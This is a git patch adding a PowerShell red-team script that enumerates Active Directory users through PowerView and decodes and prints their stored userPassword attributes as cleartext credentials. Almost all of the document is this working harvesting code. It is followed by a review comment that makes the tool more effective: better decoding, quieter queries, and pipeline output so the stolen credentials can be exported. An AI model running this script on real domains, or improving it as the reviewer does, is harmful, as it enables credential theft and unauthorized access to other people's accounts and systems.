From f9c56de0d4903edfe7ca6a9b568afb47a47c670d Mon Sep 17 00:00:00 2001
From: mgeeky
Date: Mon, 2 Mar 2020 15:35:18 +0100
Subject: [PATCH] Get-UserPasswordEntries.ps1
---
 red-teaming/Get-UserPasswordEntries.ps1 | 60 +++++++++++++++++++++++++
 1 file changed, 60 insertions(+)
 create mode 100644 red-teaming/Get-UserPasswordEntries.ps1
diff --git a/red-teaming/Get-UserPasswordEntries.ps1 b/red-teaming/Get-UserPasswordEntries.ps1
new file mode 100644
index 0000000..e7febaf
--- /dev/null
+++ b/red-teaming/Get-UserPasswordEntries.ps1
@@ -0,0 +1,60 @@
+<#
+ This script enumerates user accounts in Active Directory and then collects
+ their .userPassword properties, decodes them and prints out.
+
+ Assuming we have PowerView's Get-DomainUser command available.
+
+ Usage:
+ PS> . .\Get-UserPasswordEntries.ps1
+ PS> Get-UserPasswordEntries
+
+ Mariusz B. / mgeeky
+#>
+
+# This script requires PowerView 3.0 dev branch
+ # Import-Module powerview.ps1 -ErrorAction SilentlyContinue
+
+Function Get-UserPasswordEntries
+{
+ $num = 0
+
+ Get-DomainUser -Filter "(userpassword=*)" -Properties * | % {
+ $entry = $_
+ $passw = $entry | Select -ExpandProperty userpassword
+ $passw2 = $passw | % {[char][int]$_}
+ $passw3 = $passw2 -join ''
+ $name1 = $entry.samaccountname
+ try {
+ $desc = $entry.description
+ }
+ catch {
+ $desc = ""
+ }
+
+ try {
+ $name3 = $entry.serviceprincipalname
+ }
+ catch {
+ $name3 = ""
+ }
+
+ $num += 1
+
+ $obj = @{
+ SamAccountName = $name1
+ ServicePrincipalName = $name3
+ Description = $desc
+ UserPassword = $passw3
+ }
+ $object = new-object psobject -Property $obj
+
+ Write-Host $num".)"
+ Write-Host "SamAccountName:`t`t" $object.SamAccountName
+ Write-Host "Description:`t`t" $object.Description
+ Write-Host "ServicePrincipalName:`t" $object.ServicePrincipalName
+ Write-Host "UserPassword:`t`t" $object.UserPassword
+ Write-Host
+ }
+
+ Write-Host "Found in total: "$num" entries."
+}
\ No newline at end of file
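Review bot: The per-byte `[char][int]$_` decode feeding `$passw3` treats every byte of the userPassword octet string as its own character, so any value that is not plain ASCII is printed mangled; decode the whole value at once, `$passw3 = [System.Text.Encoding]::UTF8.GetString([byte[]]$passw)`, assuming PowerView hands the attribute back as a byte array, which is worth confirming against the Get-DomainUser output. The `-Properties *` on the Get-DomainUser call pulls every attribute of every matching account although only four are ever read; `-Properties samaccountname,description,serviceprincipalname,userpassword` is quieter on the wire and faster. `$object` is only ever passed to Write-Host and never written to the pipeline, so a caller cannot capture, filter or export the recovered cleartext credentials; emitting `$object` (or `Write-Output $object`) after the Write-Host lines would fix that without changing the console output. The two try/catch blocks around `$entry.description` and `$entry.serviceprincipalname` are dead code, since reading a missing property returns $null rather than throwing unless strict mode is enabled.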